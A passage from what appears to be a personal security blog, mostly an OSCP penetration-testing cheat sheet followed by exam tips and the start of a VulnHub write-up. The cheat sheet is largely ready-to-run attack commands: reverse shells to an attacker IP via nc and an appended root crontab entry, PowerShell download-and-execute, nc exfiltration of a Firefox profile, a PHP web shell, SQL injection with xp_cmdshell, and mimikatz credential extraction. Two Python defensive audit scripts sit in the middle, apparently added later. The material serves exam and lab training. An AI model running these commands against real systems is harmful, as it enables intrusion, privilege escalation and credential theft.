log in<br />mssqlclient.py user@x.x.x.x -windows-auth<br /><br />2. 
Use xp_dirtree "\\x.x.x.x\doesntexist" to make the server connect back and capture the user's hash with Responder.<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] Oracle - 1521</span></h3><p>Use the ODAT tool to attack the database:<br />https://github.com/quentinhardy/odat</p><h3 style="text-align: left;"><span style="color: red;">[*] Redis - 6379</span></h3><p>nmap --script redis-info -sV -p 6379 x.x.x.x<br />Either upload a webshell or SSH keys to get access to the box.<br />https://book.hacktricks.xyz/pentesting/6379-pentesting-redis</p><h3 style="text-align: left;"><span style="color: red;">[*] Windows - Privilege Escalation Quick Wins!<br /></span></h3><p>1. CHM Priv escalation<br />https://www.youtube.com/watch?v=k7gD4ufex9Q<br />https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7<br /><br />2. SAM & SYSTEM<br />If we are able to dump both the SAM and SYSTEM hives, use the following command to extract the hashes:<br />impacket-secretsdump -sam SAM -system SYSTEM local<br />Then pass the hash with tools like smbmap or psexec<br /><br />3. Juicy Potato<br />Doesn't work on Win10 and Win2019<br />Run whoami /priv and check for the following privileges:<br />• SeImpersonatePrivilege<br />• SeAssignPrimaryTokenPrivilege<br />• SeTcbPrivilege<br />• SeBackupPrivilege<br />• SeRestorePrivilege<br />• SeCreateTokenPrivilege<br />• SeLoadDriverPrivilege<br />• SeTakeOwnershipPrivilege<br />• SeDebugPrivilege<br />https://github.com/ohpe/juicy-potato<br /><br />Run from cmd:<br />juicypotato.exe -t * -p "Program to launch" -l 9001<br />Reference Machine - Conceal HTB<br /><br />4. GPP Password<br />Use PowerUp.ps1 to extract Group Policy Preferences passwords<br /><br />5. Procdump<br />Dump the memory of running processes such as browsers to extract credentials.<br /><br />6. Kerberoasting using the GetUserSPNs.py Impacket script<br />Use this script to check if any user is vulnerable to kerberoasting.<br />GetUserSPNs.py -request -dc-ip x.x.x.x domain.htb/user<br /><br />7. 
Exploiting "runas /savecred"<br />Use cmdkey /list to check for stored credentials.<br />$WScript = New-Object -ComObject Wscript.Shell<br />$shortcut = Get-ChildItem shortcut.lnk<br />$shortcut<br />$Wscript.CreateShortcut($shortcut)<br /><br />8. Use Mimikatz<br />Tips:<br />i. If it is blocked by group policy, search the AppLocker bypass list.<br />https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md<br /><br />ii. If nothing on that list works, get a Meterpreter session using Unicorn.<br />python unicorn.py windows/meterpreter/reverse_http LHOST LPORT<br />It will generate 2 files:<br />a. powershell_attack.txt - save it as msf.ps1<br />b. unicorn.rc - use this to load msfconsole (msfconsole -r unicorn.rc)<br />Download and run msf.ps1 on the target machine.<br /><br />iii. If Unicorn does not work, try Empire.<br />Reference Machine - Access HTB<br /><br />9. DPAPI<br />Download the masterkey file: c:\users\localuser\appdata\Roaming\Microsoft\Protect\x-x-x-xxxxx-xxxxxx\<br />Download the credential file: C:\users\localuser\appdata\Roaming\Microsoft\Credentials\<br /><br />Then on your local machine run the following mimikatz command to get the masterkey:<br />mimikatz# dpapi::masterkey /in:file /sid:sid-of-current-user /password:password-of-current-user<br /><br />With the masterkey, run the following command to get the cleartext password:<br />mimikatz# dpapi::cred /in:Credentials-file</p><p>10. AD Recycle Bin: recover deleted objects<br />Use the command below:<br />Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *<br /><br />Reference link: https://www.poweradmin.com/blog/restoring-deleted-objects-from-active-directory-using-ad-recycle-bin/<br /><br />11. 
AutoLogon Credentials Reuse<br />After running PowerUp we may end up with AutoLogon creds, which we can use to escalate privileges:<br /><br />$passwd = ConvertTo-SecureString 'PasswordofAdmin' -AsPlainText -Force<br />$creds = New-Object System.Management.Automation.PSCredential('administrator', $passwd)<br /><br />A reverse shell can now be opened with the supplied creds using the following command:<br />Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/InvokePowershellTCP.ps1')" -Credential $creds<br /><br />12. Use cacls<br />To check the access control list:<br />Get-ACL file.txt | fl *<br />If our user owns the file, the following grants full access to it:<br />cacls root.txt /t /e /p User:F<br /><br />13. Perform Pass the Hash using pth-winexe<br />pth-winexe -U jeeves/Administrator%NTLMHash //ServerIP cmd<br /><br />14. MS14-068<br />https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek<br />Reference Machine - Mantis<br /><br />15. ALPC Task Scheduler LPE<br />https://nvd.nist.gov/vuln/detail/CVE-2018-8440<br />To run this exploit, Authenticated Users need READ/EXECUTE access on the c:\Windows\Tasks folder; check with:<br />icacls c:\Windows\Tasks<br />Machine Reference - Conceal</p><h3 style="text-align: left;"><span style="color: red;">[*] Linux - Privilege Escalation Quick Wins!</span></h3><p>1. SSH files found:<br />If an id_rsa file is found and it is encrypted, use ssh2john.py to crack its passphrase.<br />chmod 400 id_rsa<br />ssh -i id_rsa user@x.x.x.x<br /><br />2. Look for services listening only locally (not exposed to the network) and tunnel them to your box.<br /><br />3. Create SSH keys:<br />This creates the files user (private key) and user.pub (public key):<br />ssh-keygen -f user<br />chmod 600 user<br />ssh -i user localuser@x.x.x.x<br /><br />4. Screen 4.5.0 Local Priv Esc<br />https://www.exploit-db.com/exploits/41154<br /><br />5. 
Use sudo -l to check which commands/scripts we can execute as root.<br /><br />6. Redhat/CentOS root through network-scripts<br />Command execution by simply putting a space followed by a command in the script's input value.<br />https://seclists.org/fulldisclosure/2019/Apr/24<br />Reference Machine - Networked HTB<br /><br />7. Vault token<br />https://www.vaultproject.io/docs/concepts/tokens.html<br />Reference Machine - Craft HTB<br /><br />8. Logstash input as a command<br />Reference machine - Haystack<br /><br />9. systemctl SUID exploitation<br /><br />10. PATH Hijacking using pspy<br />To check which groups our user belongs to: groups<br />To find files and folders owned by a group:<br />find / -group group_name 2>/dev/null<br />echo $PATH<br />Reference Machine - WriteUp HTB<br /><br />12. Vim<br />sudo /usr/bin/vi /var/www/html/anyfilewhichwecanaccessasaroot -c ':!/bin/bash'<br /><br />13. Priv Esc via LXD<br />https://reboare.github.io/lxd/lxd-escape.html<br />lxc init ubuntu:16.04 blah -c security.privileged=true<br />lxc config device add blah root disk source=/ path=/mnt/root recursive=true<br />Steps:<br />i. Create an Alpine build locally.<br />Link: https://github.com/saghul/lxd-alpine-builder<br />ii. Transfer the tar.gz file to the remote machine.<br />scp yourfile.tar.gz user@x.x.x.x:<br />iii. Import the image into lxc<br />lxc image import yourfile.tar.gz alpine # if this doesn't work run<br />lxc image import yourfile.tar.gz --alias alpine<br />iv. Check that it was imported with<br />lxc image list<br />v. Now create a machine<br />lxc init alpine privesc -c security.privileged=true<br />vi. lxc list to view the machine<br />vii. Mount the host's root filesystem into the container<br />lxc config device add privesc host-root disk source=/ path=/mnt/root/<br />viii. Start the container<br />lxc start privesc<br />ix. lxc exec privesc /bin/sh<br />Reference Machine - Calamity<br /><br />14. 
Module Hijacking<br />If abc.py imports a module from def.py and we have write access to<br />def.py, we can perform Module Hijacking.<br />example,<br />shell = '''<br />* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.111 4444 >/tmp/f<br />'''<br />f = open('/etc/crontab', 'a')<br />f.write(shell)<br />f.close()<br /><br />15. Inspecting Mozilla Firefox Profile<br />Check for the .mozilla folder.<br />Recover saved credentials using tools like<br />firefox_decrypt - https://github.com/unode/firefox_decrypt<br />firepwd - https://github.com/lclevy/firepwd<br />Transfer the files as follows:<br />cd /tmp<br />zip -r mozilla.zip ~/.mozilla<br />nc x.x.x.x 1234 < mozilla.zip<br /><br />16. Linux Capabilities<br />For the purpose of performing permission checks, traditional UNIX implementations<br />distinguish two categories of processes: privileged processes (whose effective user ID<br />is 0, referred to as superuser or root) and unprivileged processes (whose effective UID is<br />nonzero). Privileged processes bypass all kernel permission checks, while<br />unprivileged processes are subject to full permission checking based on the process's<br />credentials (usually: effective UID, effective GID, and supplementary group list).<br /><br />How to detect:<br />getcap -r / 2>/dev/null<br />If you find a binary with ep (effective and permitted) capabilities,<br />then look it up on GTFOBins and exploit it.<br />example,<br />https://gtfobins.github.io/gtfobins/openssl/#file-read<br />With file read/write ability, modify sudoers.<br />Reference Machine - Lightweight HTB<br /><br />17. PostgreSQL, PAM and NSS<br />Enumerate for passwords under the web directory /var/www/html:<br />grep -R password<br />https://serverfault.com/questions/538383/understand-pam-and-nss/538503#538503<br />Reference Machine - RedCross HTB<br /><br />18. 
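For the Module Hijacking item above, here is a defender-side check I have added (my code, not from the original notes): it parses a script's imports with `ast`, resolves them the way the interpreter would when the script is run directly (its own directory first, then the normal search path), and reports module files or parent directories that a non-root user could modify. The `demo()` scenario, its `backup.py` and `helper.py` are constructed for the example.

```python
"""Find modules a privileged Python script imports that someone else can edit.

Added example for the Module Hijacking note: the attacker needs write access
to a module (or its directory) that a root-run script imports. This audits
that precondition. demo() builds a constructed scenario in a temp directory.
"""
import ast
import importlib.util
import os
import stat
import tempfile
from typing import List, NamedTuple, Optional, Sequence, Set


class Issue(NamedTuple):
    module: str   # imported name as written in the script
    path: str     # file or directory an untrusted user can change
    problem: str  # why it is a hijack candidate


def imported_names(source: str) -> Set[str]:
    """Top-level names from every `import x.y` / `from x.y import z`."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def resolve(name: str, script_dir: str) -> Optional[str]:
    """File the interpreter would load for `name` when the script is executed.

    `python script.py` puts the script's directory at sys.path[0], so a sibling
    module or package shadows anything else with that name; that sibling is the
    def.py of the note. Built-in and frozen modules have no file and give None.
    """
    for candidate in (os.path.join(script_dir, name + ".py"),
                      os.path.join(script_dir, name, "__init__.py")):
        if os.path.isfile(candidate):
            return candidate
    try:
        spec = importlib.util.find_spec(name)
    except (ImportError, ValueError):
        return None
    if spec is None or spec.origin in (None, "built-in", "frozen"):
        return None
    return spec.origin


def writable_by_others(path: str, trusted_uids: Sequence[int]) -> Optional[str]:
    """How an untrusted user could modify `path`, or None if they cannot."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}, which is not trusted"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return f"writable by gid {st.st_gid}"
    return None


def audit_script(script_path: str, trusted_uids: Sequence[int] = (0,)) -> List[Issue]:
    """Report imports whose module file, or the directory holding it, an
    untrusted user could modify. A writable directory counts too, because it
    lets anyone drop a new module file (the def.py of the note) there."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as fh:
        names = imported_names(fh.read())
    issues = []
    for name in sorted(names):
        origin = resolve(name, script_dir)
        if origin is None:
            continue
        for target in (origin, os.path.dirname(origin)):
            problem = writable_by_others(target, trusted_uids)
            if problem:
                issues.append(Issue(name, target, problem))
    return issues


def demo() -> List[Issue]:
    """Constructed scenario: backup.py (imagine it in root's crontab) beside a
    helper module left world-writable. Trusting the current uid as well as
    root lets the demo run unprivileged."""
    tmp = tempfile.mkdtemp()
    helper = os.path.join(tmp, "helper.py")
    with open(helper, "w") as fh:
        fh.write("def run():\n    return 'backup done'\n")
    os.chmod(helper, 0o666)  # the misconfiguration being audited
    script = os.path.join(tmp, "backup.py")
    with open(script, "w") as fh:
        fh.write("import sys\nfrom helper import run\nprint(run())\n")
    return audit_script(script, trusted_uids=(0, os.getuid()))


if __name__ == "__main__":
    for issue in demo():
        print(f"{issue.module}: {issue.path} is {issue.problem}")
```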
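For the Linux Capabilities item above, an added audit script (my code, not from the original notes): it parses `getcap -r /` output in both formats libcap has printed (`path = cap_x+ep` and `path cap_x=ep`) and reports binaries whose effective and permitted set includes a capability that is root-equivalent on its own, the same `ep` binaries the note says to look for. The sample output and the table of capabilities treated as dangerous are constructed; on a real host, pipe `getcap -r / 2>/dev/null` into `audit()`.

```python
"""Audit getcap output for +ep binaries that hand out root-equivalent power.

Added example for the Linux Capabilities note. The DANGEROUS table and the
sample getcap lines are constructed, not read from a real host.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

# File capabilities that let whoever can run the binary escalate by themselves.
# Network caps such as cap_net_raw (ping, tcpdump) are left out on purpose:
# they are common and not root-equivalent on their own.
DANGEROUS = {
    "cap_setuid": "can change its uid to 0",
    "cap_setgid": "can join any group, e.g. shadow or disk",
    "cap_dac_override": "bypasses read/write/execute permission checks",
    "cap_dac_read_search": "reads any file, e.g. /etc/shadow or private keys",
    "cap_chown": "can take ownership of any file",
    "cap_sys_admin": "mount and many other privileged operations",
    "cap_sys_ptrace": "can attach to and inject into root processes",
    "cap_setfcap": "can grant any file capability, including those above",
}

# "<names>+<flags>" is the libcap < 2.41 spelling, "<names>=<flags>" the newer
# one. An empty name list ("=ep") means every capability.
CAPSET_RE = re.compile(
    r"^(?P<names>cap_[a-z0-9_]+(?:,cap_[a-z0-9_]+)*)?[+=](?P<flags>[eip]+)$"
)


class Finding(NamedTuple):
    path: str
    caps: List[str]
    flags: str
    reasons: List[str]


def parse_getcap_line(line: str) -> Optional[Tuple[str, List[str], str]]:
    """(path, [capability names], flags) for one getcap line, else None.

    Accepts "/usr/bin/ping = cap_net_raw+ep" and "/usr/bin/ping cap_net_raw=ep";
    blank lines and getcap warnings do not match and are skipped.
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:                       # old format: path = capset
        path, capset = line.split(" = ", 1)
    else:                                   # new format: path capset
        path, _, capset = line.rpartition(" ")
    match = CAPSET_RE.match(capset.strip())
    if not path or not match:
        return None
    names = match.group("names")
    return path, names.split(",") if names else ["all"], match.group("flags")


def classify(path: str, caps: List[str], flags: str) -> Optional[Finding]:
    """Flag a binary only when a dangerous capability is both permitted and
    effective. A bare +p needs the program to raise the capability itself,
    and +i alone only matters for inheritance across exec."""
    if "e" not in flags or "p" not in flags:
        return None
    if caps == ["all"]:
        return Finding(path, caps, flags, ["every capability is effective (=ep)"])
    reasons = [f"{cap}: {DANGEROUS[cap]}" for cap in caps if cap in DANGEROUS]
    return Finding(path, caps, flags, reasons) if reasons else None


def audit(getcap_output: str) -> List[Finding]:
    """Run each line of `getcap -r /` output through parser and classifier."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is not None:
            finding = classify(*parsed)
            if finding is not None:
                findings.append(finding)
    return findings


# Constructed sample mixing both output formats. The openssl line mirrors the
# GTFOBins file-read case referenced in the note.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/openssl cap_dac_read_search=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/local/bin/backup-agent =ep
/usr/bin/traceroute cap_net_raw=p
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_GETCAP):
        print(f"{f.path} [{','.join(f.caps)} {f.flags}]")
        for reason in f.reasons:
            print(f"    {reason}")
```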
H2 Database<br />https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html<br />H2 is an open source database management system written in Java. Curl is used to<br />verify that the login page is accessible internally:<br />curl -g -6 'http://[::1]:8002'<br />ps aux | grep h2 # To detect the H2 DBMS version<br /><br />19. Docker Privileges<br />id # Check if the current user belongs to the docker group<br />docker images --all # Reveals available images on the system.<br />docker run --rm -v /:/hostOS -it imageonbox sh<br /><br />20. Homer - Apache CouchDB<br />Exploit: https://www.exploit-db.com/exploits/44913<br />Explanation: https://justi.cz/security/2017/11/14/couchdb-rce-npm.html<br />How to detect: run the following command:<br />ps aux<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] LFI & RFI Scenario</span></h3><p>1. If LFI is found on a Windows system, try to fetch common files like<br />/windows/system32/license.rtf<br />/windows/panther/unattend.xml<br /><br />2. If you are not getting any sensitive information or are not able to exploit it,<br />go for RFI by hosting a local SMB server and confirm it by listening with nc on 445, e.g.<br />http://example.php?file=\\10.10.14.111\htb\file.txt<br />nc -lvnp 445<br />If nc receives hits, the application is vulnerable to RFI.<br /><br />3. Also run Responder and try to capture a NTLMv2 hash:<br />responder -I eth0<br /><br />4. Use tcpdump to verify:<br />tcpdump -i eth0 port 445<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] RCE Scenario</span></h3><p>1. Use nishang's Invoke-PowerShellTcp.ps1<br /><br />2. If it is not working, check whether PowerShell is in Constrained Language Mode using the<br />following command:<br />powershell.exe $ExecutionContext.SessionState.LanguageMode<br /><br />3. 
In such a scenario we can drop nc on the server via our locally hosted SMB server and get a reverse connection:<br />\\10.10.14.111\htb\nc.exe 10.10.14.111 9001 -e powershell<br />We can also drop nc.exe using the following command:<br />powershell (New-Object Net.WebClient).DownloadFile('http://x.x.x.x/nc.exe', 'nc.exe')<br />or use IWR:<br />powershell IWR -uri http://x.x.x.x/nc.exe -OutFile C:\Windows\Temp\nc.exe<br />cmd /c c:\windows\Temp\nc.exe x.x.x.x 9001 -e powershell.exe<br />Alternatively:<br />powershell wget "http://x.x.x.x/nc.exe" -outfile "nc.exe"<br />nc.exe -e cmd.exe x.x.x.x 1234<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] SQL Injection Scenario</span></h3><p>1. Use EXEC xp_cmdshell to execute a command via SQL Injection and try to steal a<br />hash using Responder.<br />id=1;EXEC xp_cmdshell whoami; --<br />or<br />id=1;declare @q varchar(200);set @q='\\x.x.x.x\localshare';exec<br />master.dbo.xp_dirtree @q; --+</p><p>2. Use INTO OUTFILE to write content to a file:<br />http://x.x.x.x/test.php?id=-1 union select 1,load_file('/etc/passwd'),3,4,5 into outfile '/var/www/html/test.txt'<br />After that visit http://x.x.x.x/test.txt<br />Also check the default 000-default.conf, which is under /etc/apache2/sites-enabled/000-default.conf<br />One can also achieve a web shell by injecting a PHP file:<br /><?php system($_REQUEST["exec"]);?><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] LFI to RCE<br /></span></h3><p>https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-canlead-to-severe-RCE-vulnerabilities.html<br />https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ </p><h3 style="text-align: left;"><span style="color: red;">[*] Reverse Connection Issues</span></h3><p>1. 
If the reverse shell dies instantly, use the following command to check whether some sort of intrusion<br />prevention system is present on the box:<br />find /home -cmin -60 # Lists files changed in the last 60 minutes on the box<br />In such a scenario copy /bin/nc to /dev/shm/newname (i.e. run nc under a new file name)<br />and try to execute the nc command again.<br /><br />2. Try listening on port 80 or 443.<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] Spawn TTY</span></h3><p>1. python3 -c 'import pty; pty.spawn("/bin/sh")'<br />2. echo os.system('/bin/bash')<br />3. /bin/sh -i<br />4. perl -e 'exec "/bin/sh";'<br />5. ruby: exec "/bin/sh"<br />6. lua: os.execute('/bin/sh')<br />7. (From within IRB)<br />exec "/bin/sh"<br />8. (From within vi)<br />:!bash<br />9. (From within vi)<br />:set shell=/bin/bash:shell<br />10. (From within nmap)<br />!sh<br /></p><p><br /></p>Latish Danawale (2020-08-13): OSCP - Tips for Beginners!<p>On 9th August 2020, I received a confirmation mail from Offensive Security that I had successfully cleared my exam and I am now an OSCP! 
</p><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1j5JbWkl4FPt6JTEDr1spb_5rVhx1guELPguBVcRkNZjmd9HlseBDfyDOdP5JnumoDUwmKga_5nmCFFVjwdYtz5R6HOVXOpjNLVGCrFSd82RfnZtrUepaqO3dhvxn6YUgEkW2RhgIKvw/s777/0.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="254" data-original-width="777" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1j5JbWkl4FPt6JTEDr1spb_5rVhx1guELPguBVcRkNZjmd9HlseBDfyDOdP5JnumoDUwmKga_5nmCFFVjwdYtz5R6HOVXOpjNLVGCrFSd82RfnZtrUepaqO3dhvxn6YUgEkW2RhgIKvw/s640/0.jpg" width="640" /></a></div> </div><div class="separator" style="clear: both; text-align: left;">After posting this on LinkedIn, I got tons of messages from people asking me for tips and for my thoughts on the OSCP exam. So, in this post I'll be sharing my notes as well as a few important takeaways which I feel will help every beginner just like me! 😄 </div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #1:</div><div class="separator" style="clear: both; text-align: left;">Always read more writeups! I know, it's a common suggestion that every other OSCP will give, but believe me, it will work!</div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #2:</div><div class="separator" style="clear: both; text-align: left;">Follow the legendary <a href="https://twitter.com/ippsec">Ippsec</a>. On his YouTube channel you will get to learn a lot of techniques. 
Only watching his videos won't help, so make proper notes.<br /></div><div class="separator" style="clear: both; text-align: left;">Link: <a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA">https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA</a> </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #3:</div><div class="separator" style="clear: both; text-align: left;">Practice, Practice and Practice! </div><div class="separator" style="clear: both; text-align: left;">OSCP labs + HTB + VulnHub would be enough.</div><div class="separator" style="clear: both; text-align: left;">(I also bought an HTB VIP subscription just to practice more on retired boxes) </div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #4:</div><div class="separator" style="clear: both; text-align: left;">Before my exam, I watched <a href="https://twitter.com/_johnhammond">John Hammond</a>'s video and he gave one very useful piece of advice:</div><div class="separator" style="clear: both; text-align: left;">"Try harder mantra won't work every time, so take a break, refresh your mind and then again Try harder!"</div><div class="separator" style="clear: both; text-align: left;">Link: <a href="https://www.youtube.com/watch?v=kdobdnQ2sGw&t=456s">https://www.youtube.com/watch?v=kdobdnQ2sGw&t=456s</a></div><div class="separator" style="clear: both; text-align: left;">As the exam is 24 hours long, it's very important to take breaks frequently, otherwise you will get exhausted.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #5:</div><div class="separator" style="clear: both; text-align: left;">Confused when it comes to Buffer Overflow? 
Well, follow <a href="https://twitter.com/thecybermentor">Cyber Mentor</a>'s BoF series and I guarantee you that it's one of the best tutorials for BoF!<br /></div><div class="separator" style="clear: both; text-align: left;">Link: <a href="https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G">https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G</a><br /></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #6:</div><div class="separator" style="clear: both; text-align: left;">I know Privilege Escalation is a nightmare for a beginner; the tools which helped me the most are as follows:</div><div class="separator" style="clear: both; text-align: left;">Windows: <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite">https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite</a></div><div class="separator" style="clear: both; text-align: left;">Linux: <a href="https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</a> <br /></div><div class="separator" style="clear: both; text-align: left;"> <br /></div><div class="separator" style="clear: both; text-align: left;">Tip #7:</div><div class="separator" style="clear: both; text-align: left;">During exploitation, if you find any suspicious technique/technology/software/binary, simply search for it on <a href="https://ippsec.rocks/">https://ippsec.rocks/</a>. 99% of the time it gave me accurate results.</div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #8:</div><div class="separator" style="clear: both; text-align: left;">The OSCP exam is all about <b>TIME MANAGEMENT</b>, so make sure you spend enough time on each machine depending upon the marks allocation. 
If you get stuck, make a note and move on to another machine. </div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #9:</div><div class="separator" style="clear: both; text-align: left;">During your exam, make sure you scan your target machines properly. You are going to refer to these scan results for the next 24 hours, so make sure they are perfect.<br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #10:</div><div class="separator" style="clear: both; text-align: left;">After compromising your target, it is very important that you collect the necessary evidence, like POCs of local.txt, proof.txt etc. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #11:</div><div class="separator" style="clear: both; text-align: left;">Reporting is a very important part, as it reflects how exactly you compromised your target, so make sure you have all the necessary POCs and use a nice template. I'd recommend the following one:</div><div class="separator" style="clear: both; text-align: left;"><a href="https://github.com/whoisflynn/OSCP-Exam-Report-Template">https://github.com/whoisflynn/OSCP-Exam-Report-Template</a></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #12:</div><div class="separator" style="clear: both; text-align: left;">Last but not least, if you fail in your 1st attempt don't feel demotivated. OSCP is just an exam, it's not the end of the world. So chill, introspect and identify where things went wrong. 
</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">I hope these tips will help you guys in your OSCP journey. If you like this post, share it with your friends!</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Happy Hacking 😊<br /></div>Latish Danawale (2020-08-07): OSCP Giveaway Challenge - Writeup<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdtdBtL74vPfF_7vxraZESCRRjJn4HB-SATD2ejJewFDUvpkuVGuRDGlwwalwmrwZlhdvfA_wLdgRjulw-heZraLfgj0dv0G-iAwIGNDI3t0YWLkH2ImeB0rMYboXmxROwxYvlFwB5UME/s649/oscp.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="438" data-original-width="649" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdtdBtL74vPfF_7vxraZESCRRjJn4HB-SATD2ejJewFDUvpkuVGuRDGlwwalwmrwZlhdvfA_wLdgRjulw-heZraLfgj0dv0G-iAwIGNDI3t0YWLkH2ImeB0rMYboXmxROwxYvlFwB5UME/w410-h277/oscp.png" width="410" /></a></div><div><br /></div><div>On 4th August, I received a message from my mentor <a href="https://twitter.com/TanoyBose" target="_blank">Tanoy</a> that Offensive Security is doing a giveaway for an OSCP voucher. But in order to participate in the giveaway, participants have to pwn a box on vulnhub.com and submit the root flag on the Discord server.</div><div><br /></div><div>So I thought let's give it a try, and to be honest it was a pretty easy box 😊. You can download the machine from the link below:</div><div><a href="https://www.vulnhub.com/entry/infosec-prep-oscp,508">https://www.vulnhub.com/entry/infosec-prep-oscp,508</a></div><div><br /></div><div>Download the VM and get its IP. In my case it was 10.0.2.10</div><div><br /></div><div><i><b>Steps:</b></i></div><div><br /></div><div>1. Start with an nmap scan. After the scan we noticed that ports 22 and 80 are open. 
<br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJeJe04xclSvCLxLxLoJNVCpKzPu64v-IJferPxSaqoaSnhzSHg7hDjLNpXfLvCa_yT4DUi8iQ90xQ19EWL7u4H55pBmePbi0i-2bvSCNGtw-TBNWm4G1CvX4i2vpSxKNZL44mczbXJ70/s1076/nmap.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="440" data-original-width="1076" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJeJe04xclSvCLxLxLoJNVCpKzPu64v-IJferPxSaqoaSnhzSHg7hDjLNpXfLvCa_yT4DUi8iQ90xQ19EWL7u4H55pBmePbi0i-2bvSCNGtw-TBNWm4G1CvX4i2vpSxKNZL44mczbXJ70/w800-h328/nmap.PNG" width="800" /></a></div><div><br /></div><div>2. The nmap scan reveals a /secret.txt file present on the web server. 
After visiting the file we got some base64 encoded data.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_d6GKgZgpG9W5yJvRXSMF0rZoobyI4VlcdAbSr4eLCBuHxA5bIJ0iZpMaj1KteQBoalBsqQgixxhoaQfkRzm9Jbn06CDvjGcDcRlYkLAwupfIVRnOpyLBjR91wBNMElm3ycS6FzK47UM/s800/base64+data.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="623" height="800" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_d6GKgZgpG9W5yJvRXSMF0rZoobyI4VlcdAbSr4eLCBuHxA5bIJ0iZpMaj1KteQBoalBsqQgixxhoaQfkRzm9Jbn06CDvjGcDcRlYkLAwupfIVRnOpyLBjR91wBNMElm3ycS6FzK47UM/w623-h800/base64+data.PNG" width="623" /></a></div><div><br /></div><div>3. 
